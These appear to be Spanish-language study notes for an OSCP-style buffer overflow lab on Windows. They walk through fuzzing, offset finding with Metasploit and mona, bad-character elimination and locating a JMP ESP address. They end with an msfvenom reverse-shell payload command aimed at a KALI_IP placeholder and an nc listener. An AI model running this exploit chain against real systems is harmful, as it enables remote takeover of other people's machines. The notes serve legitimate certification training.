python fuzzer.py
/usr/share/metasploit-framework/tools/exploit/pattern\_create.rb -l 1100
o se puede usar esto
msf-pattern_create -l 1400
python3 exploit.py
!mona findmsp -distance 1400
Ahora cambiamos el offset en el archivo de exploit.py al numero offset Y tambien rtn le ponemos un valor de "BBBB"
Reiniciar app
!mona bytearray -b "\x00"
chequear que bytearray.bin este generado en el folder de mona
python3 bad_characters.py
Reiniciar app Pegar el output a payload
!mona compare -f C:\mona\oscp\bytearray.bin -a <address>
escribimos los bad chars 00 08 09 2c 2d ad ae
Donde dice ESP le damos click derecho y Follow in Dump
Le quitamos el x08 del payload hasta llegar al ultimo bad_char
Ahora los bad chars son:09 2c 2d ad ae \x00\x08
Reiniciar app y correr exploit.py Donde dice ESP le damos click derecho y Follow in Dump
Le quitamos el x2c del payload hasta llegar al ultimo bad_char
Ahora los bad chars son:2d ad ae \x00\x08\x2c
Reiniciar app y correr exploit.py Donde dice ESP le damos click derecho y Follow in Dump
Le quitamos el xad del payload hasta llegar al ultimo bad_char
Ahora los bad chars son: ae \x00\x08\x2c\xad
!mona jmp -r esp -cpb "\x00\x08\x2c\xad"
Agarramos el numero 625011af
cambiamos el rtn y iniciamos payload='' esto en exploit.py
msfvenom -p windows/shell\_reverse\_tcp LHOST=KALI_IP LPORT=4444 EXITFUNC=thread -b "\x00\x08\x2c\xad" -f c
padding = "\x90" * 16
nc -lvnp 4444